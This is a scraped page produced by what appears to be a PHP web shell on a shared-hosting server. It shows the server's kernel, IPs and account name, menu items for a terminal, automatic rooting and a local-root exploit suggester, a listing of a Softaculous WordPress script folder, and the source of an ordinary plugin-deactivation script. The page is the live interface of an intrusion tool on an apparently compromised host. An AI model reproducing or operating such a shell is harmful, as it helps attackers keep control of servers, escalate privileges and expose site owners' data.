Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp70 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
languages
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
php53
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
php56
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
php71
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
php81
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
php82
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
plugins
[ DIR ]
drwxr-xr-x
2026-08-20 21:12
.htaccess
482
B
-rw-r--r--
2026-08-20 02:34
_htaccess
553
B
-rw-r--r--
2026-08-20 02:34
_index.php
59
B
-rw-r--r--
2026-08-20 02:34
_wp-config.php
3.39
KB
-rw-r--r--
2026-08-20 02:34
add_user.php
461
B
-rw-r--r--
2026-08-20 02:34
backup.php
3.03
KB
-rw-r--r--
2026-08-20 02:36
check_charset.php
2.02
KB
-rw-r--r--
2026-08-20 02:34
clone.php
32.22
KB
-rw-r--r--
2026-08-20 02:36
clone.xml
497
B
-rw-r--r--
2026-08-20 02:34
edit.php
11.24
KB
-rw-r--r--
2026-08-20 02:36
edit.xml
2.63
KB
-rw-r--r--
2026-08-20 02:34
extend.php
102.48
KB
-rw-r--r--
2026-08-20 02:36
fileindex.php
291
B
-rw-r--r--
2026-08-20 02:34
import.php
6.53
KB
-rw-r--r--
2026-08-20 02:36
info.xml
16.02
KB
-rw-r--r--
2026-08-20 02:34
install.js
4.2
KB
-rw-r--r--
2026-08-20 02:34
install.php
32.43
KB
-rw-r--r--
2026-08-20 02:36
install.xml
13.07
KB
-rw-r--r--
2026-08-20 02:34
md5
4.4
KB
-rw-r--r--
2026-08-20 02:36
notes.txt
6.39
KB
-rw-r--r--
2026-08-20 02:34
plugin_activate.php
596
B
-rw-r--r--
2026-08-20 02:34
plugin_deactivate.php
613
B
-rw-r--r--
2026-08-20 02:34
sign_on.php
3.28
KB
-rw-r--r--
2026-08-20 02:34
soft.htaccess
127
B
-rw-r--r--
2026-08-20 02:34
update_pass.php
639
B
-rw-r--r--
2026-08-20 02:34
upgrade.php
16.07
KB
-rw-r--r--
2026-08-20 02:36
upgrade.xml
2.48
KB
-rw-r--r--
2026-08-20 02:34
wp-config.php
3.11
KB
-rw-r--r--
2026-08-20 02:34
Save
Rename
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } require_once('wp-blog-header.php'); require_once('wp-includes/pluggable.php'); require_once('wp-admin/includes/plugin.php'); $plugins_to_deactivate = '[[plugins_to_deactivate]]'; $plugins_to_deactivate = unserialize($plugins_to_deactivate); $ret = array(); foreach($plugins_to_deactivate as $plugn_file){ // null means success $ret[$plugn_file] = deactivate_plugins($plugn_file); } echo '<plugin_deactivate>'.serialize($ret).'</plugin_deactivate>'; exit(0);